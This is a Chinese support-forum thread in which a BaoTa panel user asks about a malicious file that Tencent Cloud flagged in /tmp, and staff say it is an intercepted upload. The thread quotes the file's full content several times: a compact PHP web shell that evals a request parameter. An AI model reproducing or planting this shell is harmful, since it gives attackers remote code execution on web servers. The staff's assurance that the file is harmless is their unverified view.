【待反馈】/tmp目录下，腾讯云检测服务器中恶意文件

为了能快速了解并处理您的问题，请提供以下基础信息：

面板、插件版本：8.0.6

问题描述： 腾讯云检测服务器中恶意文件，文件路径 ：/tmp/php8jTkfx

这是文件的内容：<?php class GaM10fA5 { public function __construct($H7mu6){ @eval("/*ZG5zknRfSk*/".$H7mu6.""); }}new GaM10fA5($_REQUEST['2022']);?><?php echo md5('666');?>

相关截图（日志、错误）：

为了能快速了解并处理您的问题，请提供以下基础信息：

面板、插件版本：8.0.6

问题描述： 腾讯云检测服务器中恶意文件，文件路径 ：/tmp/php8jTkfx

这是文件的内容：<?php class GaM10fA5 { public function __construct($H7mu6){ @eval("/*ZG5zknRfSk*/".$H7mu6.""); }}new GaM10fA5($_REQUEST['2022']);?><?php echo md5('666');?>

相关截图（日志、错误）：

宝塔用户_wimffm 发表于 2024-7-10 11:52
为了能快速了解并处理您的问题，请提供以下基础信息：

您好，您在面板用微步木马扫描这个两个文件看一下

运维技术阿闯 发表于 2024-7-10 14:38
您好，您在面板用微步木马扫描这个两个文件看一下

现在扫描不了了。我把这个文件删除了

运维技术阿闯 发表于 2024-7-10 14:38
您好，您在面板用微步木马扫描这个两个文件看一下

<?php class GaM10fA5 { public function __construct($H7mu6){ @eval("/*ZG5zknRfSk*/".$H7mu6.""); }}new GaM10fA5($_REQUEST['2022']);?><?php echo md5('666');?>    这个木马文件里面的内容。我想把这个文件下载下来，本地的火绒杀毒软件报毒直接给删除了

宝塔用户_wimffm 发表于 2024-7-10 17:21
这个木马文件里面的内容。我想把这个文件下载下来，本地的火绒杀毒软件报毒直接给删除了 ...

开启一下系统加固和防入侵和防篡改吧，防止挂马

我也收到提醒了，但是进去又找不到这个文件。

运维技术阿闯 发表于 2024-7-10 18:02
开启一下系统加固和防入侵和防篡改吧，防止挂马

官方技术，我也收到这个提醒了。但是进去路径又找不到这个文件。

测速网 发表于 2024-7-11 01:46
官方技术，我也收到这个提醒了。但是进去路径又找不到这个文件。

问一下腾讯云那边，看看是怎么回事，找不到文件

运维技术阿闯 发表于 2024-7-15 09:30
问一下腾讯云那边，看看是怎么回事，找不到文件

这个木马又出现了

宝塔用户_wimffm 发表于 2024-7-19 14:40
这个木马又出现了

您好，木马在/tmp下，说明木马被拦截成功了，被拦截的文件没有到网站文件下，就遗留到了/tmp目录下.
这个就说明拦截木马成功了，

运维技术阿闯 发表于 2024-7-19 14:46
您好，木马在/tmp下，说明木马被拦截成功了，被拦截的文件没有到网站文件下，就遗留到了/tmp目录下.
这个 ...

被拦截的木马就存放在tmp这个目录下嘛

运维技术阿闯 发表于 2024-7-19 14:46
您好，木马在/tmp下，说明木马被拦截成功了，被拦截的文件没有到网站文件下，就遗留到了/tmp目录下.
这个 ...

那我需要做什么处理吗

宝塔用户_wimffm 发表于 2024-7-19 14:52
那我需要做什么处理吗

您好，是的，被拦截的就放在了tmp目录下的，这些文件对您网站没有伤害